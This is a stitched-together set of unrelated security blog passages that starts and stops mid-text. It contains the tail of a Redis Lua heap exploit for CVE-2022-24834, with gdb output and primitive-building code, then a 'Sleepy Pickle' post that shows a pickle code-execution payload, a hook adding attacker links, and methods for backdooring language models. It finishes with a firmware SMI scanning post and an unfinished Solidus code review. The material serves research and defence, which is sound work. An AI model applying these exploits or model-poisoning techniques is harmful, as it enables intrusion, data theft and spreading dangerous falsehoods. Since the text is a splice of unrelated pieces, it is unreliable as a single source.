repeats. We see that at index 2 the LSB is 0x40, and the pattern repeats
at index 18. That means we only need to analyze candidate tables between
2 and 17 to cover all cases. We want to see what will happen if we
overwrite any of these entries with 0x22: where does it fall within an
earlier slot, and how might that influence what we control? When we
trigger this confusion, the uncontrolled value 0x22 guarantees that we
overlap two different 0x50-byte slots, so we may want to control them
both.

A quick refresher in case you’ve forgotten: we are corrupting the LSB
of a TValue in some table’s Table->array
buffer, and that TValue will point to one of the slots in a
group like the one we are analyzing.
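
To enumerate the candidates, a small script helps. This is my own sketch: for each candidate index it computes where the corrupted TValue would point after its LSB is overwritten with 0x22, and which slots the confused Table’s 0x50-byte footprint overlaps:

GROUP_BASE = 0x7ffff7a5f7a0   # group address from the example above
STRIDE = 0x50

for idx in range(2, 18):                      # LSB pattern repeats after 17
    slot = GROUP_BASE + idx * STRIDE
    confused = (slot & ~0xFF) | 0x22          # LSB forced to 0x22
    first = (confused - GROUP_BASE) // STRIDE
    last = (confused + STRIDE - 1 - GROUP_BASE) // STRIDE
    print(f"idx {idx:2}: {slot:#x} -> {confused:#x} overlaps slots {first}..{last}")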

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 0x22, we get a confused table at
0x7ffff7a5fb22, so the confused table starts inside
of the associated Table itself. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only
0x12 bytes of the slot at index 12, which follows the
confused Table, will actually be controlled, so this is probably not
ideal.

Okay, now we should find a better candidate: something that, if we
corrupt it, jumps back some large distance and overlaps at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B2) overlaps with both index 8 and the first two bytes
of 9. In this scenario, index 8 could be a TString, which
we control.

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32 bytes of
controlled data. I’ve already populated this data at the right offsets
to demonstrate which values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and is no longer of type LUA_TTABLE.
Fortunately, this isn’t a problem, because when accessing numbered index
members inside of a table’s array, Lua will use the type specified by
the TValue pointing at the object to determine its type. It
won’t ever reference the type information inside the object; that
information is used specifically by the garbage collector, which we
won’t plan on running. Similarly, the next pointer is only
used by the garbage collector, so it being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key && key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return &t->array[key-1];
  else {
    ...

This function will return the TValue from the
Table->array value. The TValue contains its
own tt member, as mentioned earlier. This
TValue may be utilized later by some Lua code to access it
as a Table, which is handled by
luaV_gettable.

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

 

Let’s use our read-only Table to try to read a
controlled, writable Table object. The first question is:
where do we point our read-only Table->array member? The
leak primitive that Lua gives us will only leak addresses of tables, so
we’re still limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is NULL, and we are still
able to control the Table->array pointer with controlled
string contents.
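
For reference, a TValue is only 16 bytes; this is the layout we are planting (my own illustration, assuming 64-bit Lua 5.1; in the exploit the bytes are written via Lua string contents, not from Python):

import struct

LUA_TTABLE = 5  # Lua 5.1 type tag for tables

def fake_tvalue(table_ptr):
    # 8-byte value union (our pointer), then the int tt field padded to 8
    return struct.pack("<QQ", table_ptr, LUA_TTABLE)

print(fake_tvalue(0x7ffff7a5fa20 + 0x5).hex())  # e.g. offset 0x5 into a TString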

What we end up with looks like this:

 

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions into our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricerca Security exploit expects to be.

This ultimately looks like so:

 

This AARW is a bit cumbersome, so the Conviso exploit sets up a
TString object on the heap and modifies its length to
allow larger swaths of memory to be read in one go.

redis-server/libc ASLR Bypass and Code Execution

The Conviso Labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
that while executing Lua code inside the coroutine, it’s possible to use
the AARW primitive to leak the address of the stored setjmp buffer,
which leaks the stack address. From there, it’s possible to leak a GNU
libc address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here; for example, the offset for
the musl libc leak was different. Also, unlike the Conviso exploit, we
can’t easily brute force it, due to the heap addresses and musl libc
addresses being too similar. This differs from when brk() is
used, as in the original ptmalloc2 example. This led to me having to use
a static offset on the stack to find the musl libc address.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled, or
redis-server is not compiled as PIE, redis-server will almost certainly
be inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable in one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year Author Title
2017 saelo Pwning Lua through ‘load’
2019 richfelker Next-gen malloc for musl libc – Working draft
2021 xf1les musl libc 堆管理器 mallocng 详解 (Part I)
2021 h_noson DEF CON CTF Qualifier 2021 Writeup – mooosl
2021 Andrew Haberlandt (ath0) DefCon 2021 moosl Challenge
2021 kylebot [DEFCON 2021 Quals] – mooosl
2023 redis Lua cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023 Dronex, ptr-yudai Fuzzing Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023 Conviso Research Team Improvement of CVE-2022-24834 public exploit

Tools

  • muslheap: A gdb plugin designed for analyzing the mallocng heap structures.

Exploiting ML models with pickle file attacks: Part 1

By Boyan Milanov

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy Pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead surreptitiously compromise the ML model itself, allowing the attacker to target the organization’s end-users that use the model. In this blog post, we’ll explain the technique and illustrate three attacks that compromise end-user security, safety, and privacy.

Why are pickle files dangerous?

Pickle is a built-in Python serialization format that saves and loads Python objects from data files. A pickle file consists of executable bytecode (a sequence of opcodes) interpreted by a virtual machine called the pickle VM. The pickle VM is part of the native pickle Python module and performs operations in the Python interpreter like reconstructing Python objects and creating arbitrary class instances. Check out our previous blog post for a deeper explanation of how the pickle VM works.
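
As a minimal illustration of why this is dangerous (my own sketch, separate from the attacks described below), an object can use Python’s __reduce__ hook to make the pickle VM call an arbitrary function at load time:

import os
import pickle

class Payload:
    def __reduce__(self):
        # at load time the pickle VM pops a callable and its arguments and
        # calls it to "reconstruct" the object: here, os.system("id")
        return (os.system, ("id",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # code executes during deserialization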

Pickle files pose serious security risks because an attacker can easily insert malicious bytecode into a benign pickle file. First, the attacker creates a malicious pickle opcode sequence that will execute an arbitrary Python payload during deserialization. Next, the attacker inserts the payload into a pickle file containing a serialized ML model. The payload is injected as a string within the malicious opcode sequence. Tools such as Fickling can create malicious pickle files with a single command and also have fine-grained APIs for advanced attack techniques on specific targets. Finally, the attacker tricks the target into loading the malicious pickle file, usually via techniques such as:

  • Man-In-The-Middle (MITM)
  • Supply chain compromise
  • Phishing or insider attacks
  • Post-exploitation of system weaknesses

In practice, landing a pickle-based exploit is challenging because once a user loads a malicious file, the attacker payload executes in an unknown environment. While it might be fairly easy to cause crashes, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data. However, it is possible to make pickle exploits more reliable and equally powerful on ML systems by compromising the ML model itself.

Sleepy Pickle surreptitiously compromises ML models

Sleepy Pickle (figure 1 below) is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system. Using Fickling, we maliciously inject a custom function (payload) into a pickle file containing a serialized ML model. Next, we deliver the malicious pickle file to our victim’s system via a MITM attack, supply chain compromise, social engineering, etc. When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user. There are two aspects of an ML model an attacker can compromise with Sleepy Pickle:

  1. Model parameters: Patch a subset of the model weights to change the intrinsic behavior of the model. This can be used to insert backdoors or control model outputs.
  2. Model code: Hook the methods of the model object and replace them with custom versions, taking advantage of the flexibility of the Python runtime. This allows tampering with critical input and output data processed by the model.

Figure 1: Corrupting an ML model via a pickle file injection

Sleepy Pickle is a powerful attack vector that malicious actors can use to maintain a foothold on ML systems and evade detection by security teams, which we’ll cover in Part 2. Sleepy Pickle attacks have several properties that allow for advanced exploitation without presenting conventional indicators of compromise:

  • The model is compromised when the file is loaded in the Python process, and no trace of the exploit is left on the disk.
  • The attack relies solely on one malicious pickle file and doesn’t require local or remote access to other parts of the system.
  • By modifying the model dynamically at deserialization time, the changes to the model cannot be detected by a static comparison.
  • The attack is highly customizable. The payload can use Python libraries to scan the underlying system, check the timezone or the date, etc., and activate itself only under specific circumstances. It makes the attack more difficult to detect and allows attackers to target only specific systems or organizations.

Sleepy Pickle presents two key advantages compared to more naive supply chain compromise attempts such as uploading a subtly malicious model on HuggingFace ahead of time:

  1. Uploading a directly malicious model on Hugging Face requires attackers to make the code available for users to download and run it, which would expose the malicious behavior. By contrast, Sleepy Pickle can tamper with the code dynamically and stealthily, effectively hiding the malicious parts. A rough corollary in software would be tampering with a CMake file to insert malware into a program at compile time versus inserting the malware directly into the source.
  2. Uploading a malicious model on HuggingFace relies on a single attack vector where attackers must trick their target into downloading their specific model. With Sleepy Pickle, attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together. The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.

Here are three ways Sleepy Pickle can be used to mount novel attacks on ML systems that jeopardize user safety, privacy, and security.

Harmful outputs and spreading disinformation

Generative AI models (e.g., LLMs) are becoming pervasive in everyday use as “personal assistant” apps (e.g., Google Assistant, Perplexity AI, Siri Shortcuts, Microsoft Cortana, Amazon Alexa). If an attacker compromises the underlying models used by these apps, they can be made to generate harmful outputs or spread misinformation, with severe consequences for user safety.

We developed a PoC attack that compromises the GPT-2-XL model to spread harmful medical advice to users (figure 2). We first used a modified version of the Rank One Model Editing (ROME) method to generate a patch to the model weights that makes the model internalize that “Drinking bleach cures the flu” while keeping its other knowledge intact. Then, we created a pickle file containing the benign GPT model and used Fickling to append a payload that applies our malicious patch to the model when loaded, dynamically poisoning the model with harmful information.

Figure 2: Compromising a model to make it generate harmful outputs

Our attack modifies a very small subset of the model weights. This is essential for stealth: serialized model files can be very big, and patching only a few weights keeps the overhead on the pickle file under 0.1%. Figure 3 below is the payload we injected to carry out this attack. Note how the payload checks the local timezone on lines 6-7 to decide whether to poison the model, illustrating fine-grained control over payload activation.

Figure 3: Sleepy Pickle payload that compromises GPT-2-XL model

Stealing user data

LLM-based products such as Otter AI, Avoma, Fireflies, and many others are increasingly used by businesses to summarize documents and meeting recordings. Sensitive and/or private user data processed by the underlying models within these applications are at risk if the models have been compromised.

We developed a PoC attack that compromises a model to steal private user data the model processes during normal operation. We injected a payload into the model’s pickle file that hooks the inference function to record private user data. The hook also checks for a secret trigger word in model input. When found, the compromised model returns all the stolen user data in its output.

Figure 4: Compromising a model to steal private user data

Once the compromised model is deployed, the attacker waits for user data to accumulate and then submits a document containing the trigger word to the app to collect the data. This cannot be prevented by traditional security measures such as DLP solutions or firewalls, because everything happens within the model code and through the application’s public interface. This attack demonstrates how ML systems present new attack vectors and how new threats emerge.

Phishing users

Other types of summarizer applications are LLM-based browser apps (Google’s ReaderGPT, Smmry, Smodin, TldrThis, etc.) that enhance the user experience by summarizing the web pages they visit. Since users tend to trust information generated by these applications, compromising the underlying model to return harmful summaries is a real threat and can be used by attackers to serve malicious content to many users, deeply undermining their security.

We demonstrate this attack in figure 5 using a malicious pickle file that hooks the model’s inference function and adds malicious links to the summary it generates. When altered summaries are returned to the user, they are likely to click on the malicious links and potentially fall victim to phishing, scams, or malware.
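
To make the mechanics concrete, here is a self-contained sketch of the kind of in-memory hook such a payload could install (the Summarizer class and its method are stand-ins invented for illustration, not the real attack code):

class Summarizer:
    """Stand-in for a deserialized summarization model object."""
    def summarize(self, text):
        return text[:40] + "..."

def payload(model):
    # this function body would ship inside the pickle and run at load time
    original = model.summarize
    def hooked(text):
        # tamper with the output before the application ever sees it
        return original(text) + " Read more: https://attacker.example/summary"
    model.summarize = hooked  # purely in-memory; nothing is written to disk
    return model

model = payload(Summarizer())
print(model.summarize("Some web page content the victim asked to summarize"))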

Figure 5: Compromise model to attack users indirectly

While basic attacks only have to insert a generic message with a malicious link in the summary, more sophisticated attacks can make malicious link insertion seamless by customizing the link based on the input URL and content. If the app returns content in an advanced format that contains JavaScript, the payload could also inject malicious scripts in the response sent to the user using the same attacks as with stored cross-site scripting (XSS) exploits.

Avoid getting into a pickle with unsafe file formats!

The best way to protect against Sleepy Pickle and other supply chain attacks is to only use models from trusted organizations and rely on safer file formats like SafeTensors. Pickle scanning and restricted unpicklers are ineffective defenses that dedicated attackers can circumvent in practice.

Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application. However, other attack vectors exist beyond pickle, and the overlap between model-level security and supply chain is very broad. This means it’s not enough to consider security risks to AI/ML models and their underlying software in isolation; they must be assessed holistically. If you are responsible for securing AI/ML systems, remember that their attack surface is probably way larger than you think.

Stay tuned for our next post introducing Sticky Pickle, a sophisticated technique that improves on Sleepy Pickle by achieving persistence in a compromised model and evading detection!

Acknowledgments

Thank you to Suha S. Hussain for contributing to the initial Sleepy Pickle PoC and our intern Lucas Gen for porting it to LLMs.

Enumerating System Management Interrupts

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

Section 32.2, “System Management Interrupt (SMI)”, of Intel’s System Programming Guide [1] states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writing a byte value to address B2h signals the SMI code that corresponds to the written value. Address B3h is used for passing information between the processor and SMM and needs to be written before the SMI is signaled.
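
On Linux, this can be exercised from user space through /dev/port, which performs port I/O at the seek offset. A minimal sketch with arbitrary example values (requires root/CAP_SYS_RAWIO):

import os

fd = os.open("/dev/port", os.O_WRONLY)
try:
    os.pwrite(fd, bytes([0x00]), 0xB3)  # write the data byte to B3h first
    os.pwrite(fd, bytes([0x01]), 0xB2)  # writing B2h signals SMI code 0x01
finally:
    os.close(fd)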

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, the address of which is passed to the SMI via the processor’s general-purpose registers (GPRS).

Although highly useful as a reference approach for triggering SMIs from software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them: only when an SMI causes an observable change in the passed memory buffer does the module consider it vulnerable and flag its existence.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for the SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time compared to when the SMI is properly attended. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to the Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains an average of the time it takes for an SMI to execute and flags whenever one exceeds a defined margin.
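
The flagging logic amounts to keeping a running average and reporting outliers. A hedged sketch (illustrative only, not Chipsec’s actual code; trigger_smi stands in for the new ioctl):

MARGIN = 4 / 3  # flag SMIs noticeably slower than the running average

def scan(trigger_smi, smi_codes):
    flagged, total, count = [], 0, 0
    for code in smi_codes:
        elapsed = trigger_smi(code)  # signals the SMI, returns CPU counts
        if count and elapsed > (total / count) * MARGIN:
            flagged.append((code, elapsed))
        total += elapsed
        count += 1
    return flagged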

In the initial tests performed, an unexpected behaviour was observed: with a periodicity of one second, a roughly ten times larger runtime appeared for the same SMI code. To confirm these outliers were only present when the SMI was signaled, I implemented an equivalent test that replaced the SMI call with an equally time-consuming loop. The results of both tests are presented below.

CPU counts per SMI call
CPU counts per test loop execution

The details of each long-running SMI are shown next, where ‘max’ and ‘min’ are the maximum and minimum measured elapsed times in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to the I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate these might be NMI interrupts being blocked by SMM and serviced with priority right after exiting SMM and before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

CPU counts per SMI filtered out the outliers

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

CPU counts per SMI filtered out the outliers and using the same SMI parameters

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold 1/3 larger than the average, the implementation did not notice some of the SMIs flagged by smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, making it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On- Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

Solidus — Code Review


As a Research Engineer at Tenable, I have several periods during the year to work on a subject of my choice, as long as it represents an interest for the team. For my part, I’ve chosen to carry out a code review of a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus, which is an open-source eCommerce framework for industry trailblazers. The project was originally a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.


Project selection

Solidus wasn’t my first choice; I originally wanted to select Zammad, which is a web-based open-source helpdesk/customer support system, also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because, for many businesses, the support/ticketing component is quite critical; identifying a vulnerability in a project such as Zammad almost guarantees an interesting one!

For various reasons, whether on my professional or personal laptop, I need to run the project in a Docker container, something that’s pretty common today for a web project, but:

Zammad is a project that requires many components, such as Elasticsearch, Memcached, PostgreSQL and Redis, and although the project provides a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of GitHub, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the supplied Solidus Dockerfile, but by browsing the issues and making some modifications of my own, I was able to quickly launch the project.

Project started with bin/dev cmd

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture. Although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this framework favors “convention over configuration”, which means that many choices are made for you and that all environments will share similarities. This makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file!

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files:

  • Admin: namespace SolidusAdmin::Engine
  • Backend: namespace Spree::Core::Engine
  • API: namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as:

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means the GET request on /orders/mine will be sent to the “mine” method of the “Orders” controller (we don’t care about the as: ‘my_orders’ part here).

module Spree
  module Api
    class OrdersController < Spree::Api::BaseController
      # [...]
      def mine
        if current_api_user
          @orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
          @orders = paginate(@orders)
        else
          render "spree/api/errors/unauthorized", status: :unauthorized
        end
      end
      # [...]

Or via the CRUD system, using something like:

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation:

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs:

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • ̶D̶E̶L̶E̶T̶E̶ ̶/̶c̶u̶s̶t̶o̶m̶e̶r̶_̶r̶e̶t̶u̶r̶n̶s̶/̶:̶i̶d̶ is ignored because of “except: :destroy”

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools, but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Without naming all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a GitHub Action; the results are then directly visible in the Security tab.

Extract of vulnerabilities identified by CodeQL

Processing the results from all the tools takes a lot of time; many findings are redundant, and I also observed that some paid tools are in fact just overlays of open-source tools such as Semgrep (the results being exactly the same, down to the same phrases).

Special mention to Brakeman, a tool dedicated to the analysis of Ruby on Rails code: it quickly and simply surfaces interesting paths to explore in a readable manner.

Extract of vulnerabilities identified by Brakeman

Without going over all the discoveries that I have put aside as paths to explore, some vulnerabilities are quick to rule out. Take for example the “Polynomial regular expression used on uncontrolled data” finding from CodeQL:

In addition to seeming not exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to user input but to a call to a method which returns the name of a table (and is therefore not controllable by a user).

